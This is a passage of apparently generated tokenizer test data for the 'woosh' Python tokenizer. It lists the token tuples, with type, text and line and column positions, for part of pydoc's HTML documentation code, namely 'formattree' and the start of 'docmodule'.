woosh.Token(woosh.NAME, 'result', 729, 25, 729, 31),
woosh.Token(woosh.OP, '+', 729, 32, 729, 33),
woosh.Token(woosh.STRING, "'\\n</font></dt>'", 729, 34, 729, 50),
woosh.Token(woosh.NEWLINE, '\r\n', 729, 50, 730, 0),
woosh.Token(woosh.DEDENT, ' ', 730, 0, 730, 12),
woosh.Token(woosh.NAME, 'elif', 730, 12, 730, 16),
woosh.Token(woosh.NAME, 'type', 730, 17, 730, 21),
woosh.Token(woosh.OP, '(', 730, 21, 730, 22),
woosh.Token(woosh.NAME, 'entry', 730, 22, 730, 27),
woosh.Token(woosh.OP, ')', 730, 27, 730, 28),
woosh.Token(woosh.NAME, 'is', 730, 29, 730, 31),
woosh.Token(woosh.NAME, 'type', 730, 32, 730, 36),
woosh.Token(woosh.OP, '(', 730, 36, 730, 37),
woosh.Token(woosh.OP, '[', 730, 37, 730, 38),
woosh.Token(woosh.OP, ']', 730, 38, 730, 39),
woosh.Token(woosh.OP, ')', 730, 39, 730, 40),
woosh.Token(woosh.OP, ':', 730, 40, 730, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 730, 41, 731, 0),
woosh.Token(woosh.INDENT, ' ', 731, 0, 731, 16),
woosh.Token(woosh.NAME, 'result', 731, 16, 731, 22),
woosh.Token(woosh.OP, '=', 731, 23, 731, 24),
woosh.Token(woosh.NAME, 'result', 731, 25, 731, 31),
woosh.Token(woosh.OP, '+', 731, 32, 731, 33),
woosh.Token(woosh.STRING, "'<dd>\\n%s</dd>\\n'", 731, 34, 731, 51),
woosh.Token(woosh.OP, '%', 731, 52, 731, 53),
woosh.Token(woosh.NAME, 'self', 731, 54, 731, 58),
woosh.Token(woosh.OP, '.', 731, 58, 731, 59),
woosh.Token(woosh.NAME, 'formattree', 731, 59, 731, 69),
woosh.Token(woosh.OP, '(', 731, 69, 731, 70),
woosh.Token(woosh.NAME, 'entry', 732, 20, 732, 25),
woosh.Token(woosh.OP, ',', 732, 25, 732, 26),
woosh.Token(woosh.NAME, 'modname', 732, 27, 732, 34),
woosh.Token(woosh.OP, ',', 732, 34, 732, 35),
woosh.Token(woosh.NAME, 'c', 732, 36, 732, 37),
woosh.Token(woosh.OP, ')', 732, 37, 732, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 732, 38, 733, 0),
woosh.Token(woosh.DEDENT, ' ', 733, 0, 733, 8),
woosh.Token(woosh.DEDENT, '', 733, 8, 733, 8),
woosh.Token(woosh.NAME, 'return', 733, 8, 733, 14),
woosh.Token(woosh.STRING, "'<dl>\\n%s</dl>\\n'", 733, 15, 733, 32),
woosh.Token(woosh.OP, '%', 733, 33, 733, 34),
woosh.Token(woosh.NAME, 'result', 733, 35, 733, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 733, 41, 734, 0),
woosh.Token(woosh.DEDENT, ' ', 735, 0, 735, 4),
woosh.Token(woosh.NAME, 'def', 735, 4, 735, 7),
woosh.Token(woosh.NAME, 'docmodule', 735, 8, 735, 17),
woosh.Token(woosh.OP, '(', 735, 17, 735, 18),
woosh.Token(woosh.NAME, 'self', 735, 18, 735, 22),
woosh.Token(woosh.OP, ',', 735, 22, 735, 23),
woosh.Token(woosh.NAME, 'object', 735, 24, 735, 30),
woosh.Token(woosh.OP, ',', 735, 30, 735, 31),
woosh.Token(woosh.NAME, 'name', 735, 32, 735, 36),
woosh.Token(woosh.OP, '=', 735, 36, 735, 37),
woosh.Token(woosh.NAME, 'None', 735, 37, 735, 41),
woosh.Token(woosh.OP, ',', 735, 41, 735, 42),
woosh.Token(woosh.NAME, 'mod', 735, 43, 735, 46),
woosh.Token(woosh.OP, '=', 735, 46, 735, 47),
woosh.Token(woosh.NAME, 'None', 735, 47, 735, 51),
woosh.Token(woosh.OP, ',', 735, 51, 735, 52),
woosh.Token(woosh.OP, '*', 735, 53, 735, 54),
woosh.Token(woosh.NAME, 'ignored', 735, 54, 735, 61),
woosh.Token(woosh.OP, ')', 735, 61, 735, 62),
woosh.Token(woosh.OP, ':', 735, 62, 735, 63),
woosh.Token(woosh.NEWLINE, '\r\n', 735, 63, 736, 0),
woosh.Token(woosh.INDENT, ' ', 736, 0, 736, 8),
woosh.Token(woosh.STRING, '"""Produce HTML documentation for a module object."""', 736, 8, 736, 61),
woosh.Token(woosh.NEWLINE, '\r\n', 736, 61, 737, 0),
woosh.Token(woosh.NAME, 'name', 737, 8, 737, 12),
woosh.Token(woosh.OP, '=', 737, 13, 737, 14),
woosh.Token(woosh.NAME, 'object', 737, 15, 737, 21),
woosh.Token(woosh.OP, '.', 737, 21, 737, 22),
woosh.Token(woosh.NAME, '__name__', 737, 22, 737, 30),
woosh.Token(woosh.COMMENT, '# ignore the passed-in name', 737, 31, 737, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 737, 58, 738, 0),
woosh.Token(woosh.NAME, 'try', 738, 8, 738, 11),
woosh.Token(woosh.OP, ':', 738, 11, 738, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 738, 12, 739, 0),
woosh.Token(woosh.INDENT, ' ', 739, 0, 739, 12),
woosh.Token(woosh.NAME, 'all', 739, 12, 739, 15),
woosh.Token(woosh.OP, '=', 739, 16, 739, 17),
woosh.Token(woosh.NAME, 'object', 739, 18, 739, 24),
woosh.Token(woosh.OP, '.', 739, 24, 739, 25),
woosh.Token(woosh.NAME, '__all__', 739, 25, 739, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 739, 32, 740, 0),
woosh.Token(woosh.DEDENT, ' ', 740, 0, 740, 8),
woosh.Token(woosh.NAME, 'except', 740, 8, 740, 14),
woosh.Token(woosh.NAME, 'AttributeError', 740, 15, 740, 29),
woosh.Token(woosh.OP, ':', 740, 29, 740, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 740, 30, 741, 0),
woosh.Token(woosh.INDENT, ' ', 741, 0, 741, 12),
woosh.Token(woosh.NAME, 'all', 741, 12, 741, 15),
woosh.Token(woosh.OP, '=', 741, 16, 741, 17),
woosh.Token(woosh.NAME, 'None', 741, 18, 741, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 741, 22, 742, 0),
woosh.Token(woosh.DEDENT, ' ', 742, 0, 742, 8),
woosh.Token(woosh.NAME, 'parts', 742, 8, 742, 13),
woosh.Token(woosh.OP, '=', 742, 14, 742, 15),
woosh.Token(woosh.NAME, 'name', 742, 16, 742, 20),
woosh.Token(woosh.OP, '.', 742, 20, 742, 21),
woosh.Token(woosh.NAME, 'split', 742, 21, 742, 26),
woosh.Token(woosh.OP, '(', 742, 26, 742, 27),
woosh.Token(woosh.STRING, "'.'", 742, 27, 742, 30),
woosh.Token(woosh.OP, ')', 742, 30, 742, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 742, 31, 743, 0),
woosh.Token(woosh.NAME, 'links', 743, 8, 743, 13),
woosh.Token(woosh.OP, '=', 743, 14, 743, 15),
woosh.Token(woosh.OP, '[', 743, 16, 743, 17),
woosh.Token(woosh.OP, ']', 743, 17, 743, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 743, 18, 744, 0),
woosh.Token(woosh.NAME, 'for', 744, 8, 744, 11),
woosh.Token(woosh.NAME, 'i', 744, 12, 744, 13),
woosh.Token(woosh.NAME, 'in', 744, 14, 744, 16),
woosh.Token(woosh.NAME, 'range', 744, 17, 744, 22),
woosh.Token(woosh.OP, '(', 744, 22, 744, 23),
woosh.Token(woosh.NAME, 'len', 744, 23, 744, 26),
woosh.Token(woosh.OP, '(', 744, 26, 744, 27),
woosh.Token(woosh.NAME, 'parts', 744, 27, 744, 32),
woosh.Token(woosh.OP, ')', 744, 32, 744, 33),
woosh.Token(woosh.OP, '-', 744, 33, 744, 34),
woosh.Token(woosh.NUMBER, '1', 744, 34, 744, 35),
woosh.Token(woosh.OP, ')', 744, 35, 744, 36),
woosh.Token(woosh.OP, ':', 744, 36, 744, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 744, 37, 745, 0),
woosh.Token(woosh.INDENT, ' ', 745, 0, 745, 12),
woosh.Token(woosh.NAME, 'links', 745, 12, 745, 17),
woosh.Token(woosh.OP, '.', 745, 17, 745, 18),
woosh.Token(woosh.NAME, 'append', 745, 18, 745, 24),
woosh.Token(woosh.OP, '(', 745, 24, 745, 25),
woosh.Token(woosh.STRING, '\'<a href="%s.html"><font color="#ffffff">%s</font></a>\'', 746, 16, 746, 71),
woosh.Token(woosh.OP, '%', 746, 72, 746, 73),
woosh.Token(woosh.OP, '(', 747, 16, 747, 17),
woosh.Token(woosh.STRING, "'.'", 747, 17, 747, 20),
woosh.Token(woosh.OP, '.', 747, 20, 747, 21),
woosh.Token(woosh.NAME, 'join', 747, 21, 747, 25),
woosh.Token(woosh.OP, '(', 747, 25, 747, 26),
woosh.Token(woosh.NAME, 'parts', 747, 26, 747, 31),
woosh.Token(woosh.OP, '[', 747, 31, 747, 32),
woosh.Token(woosh.OP, ':', 747, 32, 747, 33),
woosh.Token(woosh.NAME, 'i', 747, 33, 747, 34),
woosh.Token(woosh.OP, '+', 747, 34, 747, 35),
woosh.Token(woosh.NUMBER, '1', 747, 35, 747, 36),
woosh.Token(woosh.OP, ']', 747, 36, 747, 37),
woosh.Token(woosh.OP, ')', 747, 37, 747, 38),
woosh.Token(woosh.OP, ',', 747, 38, 747, 39),
woosh.Token(woosh.NAME, 'parts', 747, 40, 747, 45),
woosh.Token(woosh.OP, '[', 747, 45, 747, 46),
woosh.Token(woosh.NAME, 'i', 747, 46, 747, 47),
woosh.Token(woosh.OP, ']', 747, 47, 747, 48),
woosh.Token(woosh.OP, ')', 747, 48, 747, 49),
woosh.Token(woosh.OP, ')', 747, 49, 747, 50),
woosh.Token(woosh.NEWLINE, '\r\n', 747, 50, 748, 0),
woosh.Token(woosh.DEDENT, ' ', 748, 0, 748, 8),
woosh.Token(woosh.NAME, 'linkedname', 748, 8, 748, 18),
woosh.Token(woosh.OP, '=', 748, 19, 748, 20),
woosh.Token(woosh.STRING, "'.'", 748, 21, 748, 24),
woosh.Token(woosh.OP, '.', 748, 24, 748, 25),
woosh.Token(woosh.NAME, 'join', 748, 25, 748, 29),
woosh.Token(woosh.OP, '(', 748, 29, 748, 30),
woosh.Token(woosh.NAME, 'links', 748, 30, 748, 35),
woosh.Token(woosh.OP, '+', 748, 36, 748, 37),
woosh.Token(woosh.NAME, 'parts', 748, 38, 748, 43),
woosh.Token(woosh.OP, '[', 748, 43, 748, 44),
woosh.Token(woosh.OP, '-', 748, 44, 748, 45),
woosh.Token(woosh.NUMBER, '1', 748, 45, 748, 46),
woosh.Token(woosh.OP, ':', 748, 46, 748, 47),
woosh.Token(woosh.OP, ']', 748, 47, 748, 48),
woosh.Token(woosh.OP, ')', 748, 48, 748, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 748, 49, 749, 0),
woosh.Token(woosh.NAME, 'head', 749, 8, 749, 12),
woosh.Token(woosh.OP, '=', 749, 13, 749, 14),
woosh.Token(woosh.STRING, "'<big><big><strong>%s</strong></big></big>'", 749, 15, 749, 58),
woosh.Token(woosh.OP, '%', 749, 59, 749, 60),
woosh.Token(woosh.NAME, 'linkedname', 749, 61, 749, 71),
woosh.Token(woosh.NEWLINE, '\r\n', 749, 71, 750, 0),
woosh.Token(woosh.NAME, 'try', 750, 8, 750, 11),
woosh.Token(woosh.OP, ':', 750, 11, 750, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 750, 12, 751, 0),
woosh.Token(woosh.INDENT, ' ', 751, 0, 751, 12),
woosh.Token(woosh.NAME, 'path', 751, 12, 751, 16),
woosh.Token(woosh.OP, '=', 751, 17, 751, 18),
woosh.Token(woosh.NAME, 'inspect', 751, 19, 751, 26),
woosh.Token(woosh.OP, '.', 751, 26, 751, 27),
woosh.Token(woosh.NAME, 'getabsfile', 751, 27, 751, 37),
woosh.Token(woosh.OP, '(', 751, 37, 751, 38),
woosh.Token(woosh.NAME, 'object', 751, 38, 751, 44),
woosh.Token(woosh.OP, ')', 751, 44, 751, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 751, 45, 752, 0),
woosh.Token(woosh.NAME, 'url', 752, 12, 752, 15),
woosh.Token(woosh.OP, '=', 752, 16, 752, 17),
woosh.Token(woosh.NAME, 'urllib', 752, 18, 752, 24),
woosh.Token(woosh.OP, '.', 752, 24, 752, 25),
woosh.Token(woosh.NAME, 'parse', 752, 25, 752, 30),
woosh.Token(woosh.OP, '.', 752, 30, 752, 31),
woosh.Token(woosh.NAME, 'quote', 752, 31, 752, 36),
woosh.Token(woosh.OP, '(', 752, 36, 752, 37),
woosh.Token(woosh.NAME, 'path', 752, 37, 752, 41),
woosh.Token(woosh.OP, ')', 752, 41, 752, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 752, 42, 753, 0),
woosh.Token(woosh.NAME, 'filelink', 753, 12, 753, 20),
woosh.Token(woosh.OP, '=', 753, 21, 753, 22),
woosh.Token(woosh.NAME, 'self', 753, 23, 753, 27),
woosh.Token(woosh.OP, '.', 753, 27, 753, 28),
woosh.Token(woosh.NAME, 'filelink', 753, 28, 753, 36),
woosh.Token(woosh.OP, '(', 753, 36, 753, 37),
woosh.Token(woosh.NAME, 'url', 753, 37, 753, 40),
woosh.Token(woosh.OP, ',', 753, 40, 753, 41),
woosh.Token(woosh.NAME, 'path', 753, 42, 753, 46),
woosh.Token(woosh.OP, ')', 753, 46, 753, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 753, 47, 754, 0),
woosh.Token(woosh.DEDENT, ' ', 754, 0, 754, 8),
woosh.Token(woosh.NAME, 'except', 754, 8, 754, 14),
woosh.Token(woosh.NAME, 'TypeError', 754, 15, 754, 24),
woosh.Token(woosh.OP, ':', 754, 24, 754, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 754, 25, 755, 0),
woosh.Token(woosh.INDENT, ' ', 755, 0, 755, 12),
woosh.Token(woosh.NAME, 'filelink', 755, 12, 755, 20),
woosh.Token(woosh.OP, '=', 755, 21, 755, 22),
woosh.Token(woosh.STRING, "'(built-in)'", 755, 23, 755, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 755, 35, 756, 0),
woosh.Token(woosh.DEDENT, ' ', 756, 0, 756, 8),
woosh.Token(woosh.NAME, 'info', 756, 8, 756, 12),
woosh.Token(woosh.OP, '=', 756, 13, 756, 14),
woosh.Token(woosh.OP, '[', 756, 15, 756, 16),
woosh.Token(woosh.OP, ']', 756, 16, 756, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 756, 17, 757, 0),
woosh.Token(woosh.NAME, 'if', 757, 8, 757, 10),
woosh.Token(woosh.NAME, 'hasattr', 757, 11, 757, 18),
woosh.Token(woosh.OP, '(', 757, 18, 757, 19),
woosh.Token(woosh.NAME, 'object', 757, 19, 757, 25),
woosh.Token(woosh.OP, ',', 757, 25, 757, 26),
woosh.Token(woosh.STRING, "'__version__'", 757, 27, 757, 40),
woosh.Token(woosh.OP, ')', 757, 40, 757, 41),
woosh.Token(woosh.OP, ':', 757, 41, 757, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 757, 42, 758, 0),
woosh.Token(woosh.INDENT, ' ', 758, 0, 758, 12),
woosh.Token(woosh.NAME, 'version', 758, 12, 758, 19),
woosh.Token(woosh.OP, '=', 758, 20, 758, 21),
woosh.Token(woosh.NAME, 'str', 758, 22, 758, 25),
woosh.Token(woosh.OP, '(', 758, 25, 758, 26),
woosh.Token(woosh.NAME, 'object', 758, 26, 758, 32),
woosh.Token(woosh.OP, '.', 758, 32, 758, 33),
woosh.Token(woosh.NAME, '__version__', 758, 33, 758, 44),
woosh.Token(woosh.OP, ')', 758, 44, 758, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 758, 45, 759, 0),
woosh.Token(woosh.NAME, 'if', 759, 12, 759, 14),
woosh.Token(woosh.NAME, 'version', 759, 15, 759, 22),
woosh.Token(woosh.OP, '[', 759, 22, 759, 23),
woosh.Token(woosh.OP, ':', 759, 23, 759, 24),
woosh.Token(woosh.NUMBER, '11', 759, 24, 759, 26),
woosh.Token(woosh.OP, ']', 759, 26, 759, 27),
woosh.Token(woosh.OP, '==', 759, 28, 759, 30),
woosh.Token(woosh.STRING, "'$'", 759, 31, 759, 34),
woosh.Token(woosh.OP, '+', 759, 35, 759, 36),
woosh.Token(woosh.STRING, "'Revision: '", 759, 37, 759, 49),
woosh.Token(woosh.NAME, 'and', 759, 50, 759, 53),
woosh.Token(woosh.NAME, 'version', 759, 54, 759, 61),
woosh.Token(woosh.OP, '[', 759, 61, 759, 62),
woosh.Token(woosh.OP, '-', 759, 62, 759, 63),
woosh.Token(woosh.NUMBER, '1', 759, 63, 759, 64),
woosh.Token(woosh.OP, ':', 759, 64, 759, 65),
woosh.Token(woosh.OP, ']', 759, 65, 759, 66),
woosh.Token(woosh.OP, '==', 759, 67, 759, 69),
woosh.Token(woosh.STRING, "'$'", 759, 70, 759, 73),
woosh.Token(woosh.OP, ':', 759, 73, 759, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 759, 74, 760, 0),
woosh.Token(woosh.INDENT, ' ', 760, 0, 760, 16),
woosh.Token(woosh.NAME, 'version', 760, 16, 760, 23),
woosh.Token(woosh.OP, '=', 760, 24, 760, 25),
woosh.Token(woosh.NAME, 'version', 760, 26, 760, 33),
woosh.Token(woosh.OP, '[', 760, 33, 760, 34),
woosh.Token(woosh.NUMBER, '11', 760, 34, 760, 36),
woosh.Token(woosh.OP, ':', 760, 36, 760, 37),
woosh.Token(woosh.OP, '-', 760, 37, 760, 38),
woosh.Token(woosh.NUMBER, '1', 760, 38, 760, 39),
woosh.Token(woosh.OP, ']', 760, 39, 760, 40),
woosh.Token(woosh.OP, '.', 760, 40, 760, 41),
woosh.Token(woosh.NAME, 'strip', 760, 41, 760, 46),
woosh.Token(woosh.OP, '(', 760, 46, 760, 47),
woosh.Token(woosh.OP, ')', 760, 47, 760, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 760, 48, 761, 0),
woosh.Token(woosh.DEDENT, ' ', 761, 0, 761, 12),
woosh.Token(woosh.NAME, 'info', 761, 12, 761, 16),
woosh.Token(woosh.OP, '.', 761, 16, 761, 17),
woosh.Token(woosh.NAME, 'append', 761, 17, 761, 23),
woosh.Token(woosh.OP, '(', 761, 23, 761, 24),
woosh.Token(woosh.STRING, "'version %s'", 761, 24, 761, 36),
woosh.Token(woosh.OP, '%', 761, 37, 761, 38),
woosh.Token(woosh.NAME, 'self', 761, 39, 761, 43),
woosh.Token(woosh.OP, '.', 761, 43, 761, 44),
woosh.Token(woosh.NAME, 'escape', 761, 44, 761, 50),
woosh.Token(woosh.OP, '(', 761, 50, 761, 51),
woosh.Token(woosh.NAME, 'version', 761, 51, 761, 58),
woosh.Token(woosh.OP, ')', 761, 58, 761, 59),
woosh.Token(woosh.OP, ')', 761, 59, 761, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 761, 60, 762, 0),
woosh.Token(woosh.DEDENT, ' ', 762, 0, 762, 8),
woosh.Token(woosh.NAME, 'if', 762, 8, 762, 10),
woosh.Token(woosh.NAME, 'hasattr', 762, 11, 762, 18),
woosh.Token(woosh.OP, '(', 762, 18, 762, 19),
woosh.Token(woosh.NAME, 'object', 762, 19, 762, 25),
woosh.Token(woosh.OP, ',', 762, 25, 762, 26),
woosh.Token(woosh.STRING, "'__date__'", 762, 27, 762, 37),
woosh.Token(woosh.OP, ')', 762, 37, 762, 38),
woosh.Token(woosh.OP, ':', 762, 38, 762, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 762, 39, 763, 0),
woosh.Token(woosh.INDENT, ' ', 763, 0, 763, 12),
woosh.Token(woosh.NAME, 'info', 763, 12, 763, 16),
woosh.Token(woosh.OP, '.', 763, 16, 763, 17),
woosh.Token(woosh.NAME, 'append', 763, 17, 763, 23),
woosh.Token(woosh.OP, '(', 763, 23, 763, 24),
woosh.Token(woosh.NAME, 'self', 763, 24, 763, 28),
woosh.Token(woosh.OP, '.', 763, 28, 763, 29),
woosh.Token(woosh.NAME, 'escape', 763, 29, 763, 35),
woosh.Token(woosh.OP, '(', 763, 35, 763, 36),
woosh.Token(woosh.NAME, 'str', 763, 36, 763, 39),
woosh.Token(woosh.OP, '(', 763, 39, 763, 40),
woosh.Token(woosh.NAME, 'object', 763, 40, 763, 46),
woosh.Token(woosh.OP, '.', 763, 46, 763, 47),
woosh.Token(woosh.NAME, '__date__', 763, 47, 763, 55),
woosh.Token(woosh.OP, ')', 763, 55, 763, 56),
woosh.Token(woosh.OP, ')', 763, 56, 763, 57),
woosh.Token(woosh.OP, ')', 763, 57, 763, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 763, 58, 764, 0),
woosh.Token(woosh.DEDENT, ' ', 764, 0, 764, 8),
woosh.Token(woosh.NAME, 'if', 764, 8, 764, 10),
woosh.Token(woosh.NAME, 'info', 764, 11, 764, 15),
woosh.Token(woosh.OP, ':', 764, 15, 764, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 764, 16, 765, 0),
woosh.Token(woosh.INDENT, ' ', 765, 0, 765, 12),
woosh.Token(woosh.NAME, 'head', 765, 12, 765, 16),
woosh.Token(woosh.OP, '=', 765, 17, 765, 18),
woosh.Token(woosh.NAME, 'head', 765, 19, 765, 23),
woosh.Token(woosh.OP, '+', 765, 24, 765, 25),
woosh.Token(woosh.STRING, "' (%s)'", 765, 26, 765, 33),
woosh.Token(woosh.OP, '%', 765, 34, 765, 35),
woosh.Token(woosh.STRING, "', '", 765, 36, 765, 40),
woosh.Token(woosh.OP, '.', 765, 40, 765, 41),
woosh.Token(woosh.NAME, 'join', 765, 41, 765, 45),
woosh.Token(woosh.OP, '(', 765, 45, 765, 46),
woosh.Token(woosh.NAME, 'info', 765, 46, 765, 50),
woosh.Token(woosh.OP, ')', 765, 50, 765, 51),
woosh.Token(woosh.NEWLINE, '\r\n', 765, 51, 766, 0),
woosh.Token(woosh.DEDENT, ' ', 766, 0, 766, 8),
woosh.Token(woosh.NAME, 'docloc', 766, 8, 766, 14),
woosh.Token(woosh.OP, '=', 766, 15, 766, 16),
woosh.Token(woosh.NAME, 'self', 766, 17, 766, 21),
woosh.Token(woosh.OP, '.', 766, 21, 766, 22),
woosh.Token(woosh.NAME, 'getdocloc', 766, 22, 766, 31),
woosh.Token(woosh.OP, '(', 766, 31, 766, 32),
woosh.Token(woosh.NAME, 'object', 766, 32, 766, 38),
woosh.Token(woosh.OP, ')', 766, 38, 766, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 766, 39, 767, 0),
woosh.Token(woosh.NAME, 'if', 767, 8, 767, 10),
woosh.Token(woosh.NAME, 'docloc', 767, 11, 767, 17),
woosh.Token(woosh.NAME, 'is', 767, 18, 767, 20),
woosh.Token(woosh.NAME, 'not', 767, 21, 767, 24),
woosh.Token(woosh.NAME, 'None', 767, 25, 767, 29),
woosh.Token(woosh.OP, ':', 767, 29, 767, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 767, 30, 768, 0),
woosh.Token(woosh.INDENT, ' ', 768, 0, 768, 12),
woosh.Token(woosh.NAME, 'docloc', 768, 12, 768, 18),
woosh.Token(woosh.OP, '=', 768, 19, 768, 20),
woosh.Token(woosh.STRING, '\'<br><a href="%(docloc)s">Module Reference</a>\'', 768, 21, 768, 68),
woosh.Token(woosh.OP, '%', 768, 69, 768, 70),
woosh.Token(woosh.NAME, 'locals', 768, 71, 768, 77),
woosh.Token(woosh.OP, '(', 768, 77, 768, 78),
woosh.Token(woosh.OP, ')', 768, 78, 768, 79),
woosh.Token(woosh.NEWLINE, '\r\n', 768, 79, 769, 0),
woosh.Token(woosh.DEDENT, ' ', 769, 0, 769, 8),
woosh.Token(woosh.NAME, 'else', 769, 8, 769, 12),
woosh.Token(woosh.OP, ':', 769, 12, 769, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 769, 13, 770, 0),
woosh.Token(woosh.INDENT, ' ', 770, 0, 770, 12),
woosh.Token(woosh.NAME, 'docloc', 770, 12, 770, 18),
woosh.Token(woosh.OP, '=', 770, 19, 770, 20),
woosh.Token(woosh.STRING, "''", 770, 21, 770, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 770, 23, 771, 0),
woosh.Token(woosh.DEDENT, ' ', 771, 0, 771, 8),
woosh.Token(woosh.NAME, 'result', 771, 8, 771, 14),
woosh.Token(woosh.OP, '=', 771, 15, 771, 16),
woosh.Token(woosh.NAME, 'self', 771, 17, 771, 21),
woosh.Token(woosh.OP, '.', 771, 21, 771, 22),
woosh.Token(woosh.NAME, 'heading', 771, 22, 771, 29),
woosh.Token(woosh.OP, '(', 771, 29, 771, 30),
woosh.Token(woosh.NAME, 'head', 772, 12, 772, 16),
woosh.Token(woosh.OP, ',', 772, 16, 772, 17),
woosh.Token(woosh.STRING, "'#ffffff'", 772, 18, 772, 27),
woosh.Token(woosh.OP, ',', 772, 27, 772, 28),
woosh.Token(woosh.STRING, "'#7799ee'", 772, 29, 772, 38),
woosh.Token(woosh.OP, ',', 772, 38, 772, 39),
woosh.Token(woosh.STRING, '\'<a href=".">index</a><br>\'', 773, 12, 773, 39),
woosh.Token(woosh.OP, '+', 773, 40, 773, 41),
woosh.Token(woosh.NAME, 'filelink', 773, 42, 773, 50),
woosh.Token(woosh.OP, '+', 773, 51, 773, 52),
woosh.Token(woosh.NAME, 'docloc', 773, 53, 773, 59),
woosh.Token(woosh.OP, ')', 773, 59, 773, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 773, 60, 774, 0),
woosh.Token(woosh.NAME, 'modules', 775, 8, 775, 15),
woosh.Token(woosh.OP, '=', 775, 16, 775, 17),
woosh.Token(woosh.NAME, 'inspect', 775, 18, 775, 25),
woosh.Token(woosh.OP, '.', 775, 25, 775, 26),
woosh.Token(woosh.NAME, 'getmembers', 775, 26, 775, 36),
woosh.Token(woosh.OP, '(', 775, 36, 775, 37),
woosh.Token(woosh.NAME, 'object', 775, 37, 775, 43),
woosh.Token(woosh.OP, ',', 775, 43, 775, 44),
woosh.Token(woosh.NAME, 'inspect', 775, 45, 775, 52),
woosh.Token(woosh.OP, '.', 775, 52, 775, 53),
woosh.Token(woosh.NAME, 'ismodule', 775, 53, 775, 61),
woosh.Token(woosh.OP, ')', 775, 61, 775, 62),
woosh.Token(woosh.NEWLINE, '\r\n', 775, 62, 776, 0),
woosh.Token(woosh.NAME, 'classes', 777, 8, 777, 15),
woosh.Token(woosh.OP, ',', 777, 15, 777, 16),
woosh.Token(woosh.NAME, 'cdict', 777, 17, 777, 22),
woosh.Token(woosh.OP, '=', 777, 23, 777, 24),
woosh.Token(woosh.OP, '[', 777, 25, 777, 26),
woosh.Token(woosh.OP, ']', 777, 26, 777, 27),
woosh.Token(woosh.OP, ',', 777, 27, 777, 28),
woosh.Token(woosh.OP, '{', 777, 29, 777, 30),
woosh.Token(woosh.OP, '}', 777, 30, 777, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 777, 31, 778, 0),
woosh.Token(woosh.NAME, 'for', 778, 8, 778, 11),
woosh.Token(woosh.NAME, 'key', 778, 12, 778, 15),
woosh.Token(woosh.OP, ',', 778, 15, 778, 16),
woosh.Token(woosh.NAME, 'value', 778, 17, 778, 22),
woosh.Token(woosh.NAME, 'in', 778, 23, 778, 25),
woosh.Token(woosh.NAME, 'inspect', 778, 26, 778, 33),
woosh.Token(woosh.OP, '.', 778, 33, 778, 34),
woosh.Token(woosh.NAME, 'getmembers', 778, 34, 778, 44),
woosh.Token(woosh.OP, '(', 778, 44, 778, 45),
woosh.Token(woosh.NAME, 'object', 778, 45, 778, 51),
woosh.Token(woosh.OP, ',', 778, 51, 778, 52),
woosh.Token(woosh.NAME, 'inspect', 778, 53, 778, 60),
woosh.Token(woosh.OP, '.', 778, 60, 778, 61),
woosh.Token(woosh.NAME, 'isclass', 778, 61, 778, 68),
woosh.Token(woosh.OP, ')', 778, 68, 778, 69),
woosh.Token(woosh.OP, ':', 778, 69, 778, 70),
woosh.Token(woosh.NEWLINE, '\r\n', 778, 70, 779, 0),
woosh.Token(woosh.COMMENT, '# if __all__ exists, believe it. Otherwise use old heuristic.', 779, 12, 779, 74),
woosh.Token(woosh.INDENT, ' ', 780, 0, 780, 12),
woosh.Token(woosh.NAME, 'if', 780, 12, 780, 14),
woosh.Token(woosh.OP, '(', 780, 15, 780, 16),
woosh.Token(woosh.NAME, 'all', 780, 16, 780, 19),
woosh.Token(woosh.NAME, 'is', 780, 20, 780, 22),
woosh.Token(woosh.NAME, 'not', 780, 23, 780, 26),
woosh.Token(woosh.NAME, 'None', 780, 27, 780, 31),
woosh.Token(woosh.NAME, 'or', 780, 32, 780, 34),
woosh.Token(woosh.OP, '(', 781, 16, 781, 17),
woosh.Token(woosh.NAME, 'inspect', 781, 17, 781, 24),
woosh.Token(woosh.OP, '.', 781, 24, 781, 25),
woosh.Token(woosh.NAME, 'getmodule', 781, 25, 781, 34),
woosh.Token(woosh.OP, '(', 781, 34, 781, 35),
woosh.Token(woosh.NAME, 'value', 781, 35, 781, 40),
woosh.Token(woosh.OP, ')', 781, 40, 781, 41),
woosh.Token(woosh.NAME, 'or', 781, 42, 781, 44),
woosh.Token(woosh.NAME, 'object', 781, 45, 781, 51),
woosh.Token(woosh.OP, ')', 781, 51, 781, 52),
woosh.Token(woosh.NAME, 'is', 781, 53, 781, 55),
woosh.Token(woosh.NAME, 'object', 781, 56, 781, 62),
woosh.Token(woosh.OP, ')', 781, 62, 781, 63),
woosh.Token(woosh.OP, ':', 781, 63, 781, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 781, 64, 782, 0),
woosh.Token(woosh.INDENT, ' ', 782, 0, 782, 16),
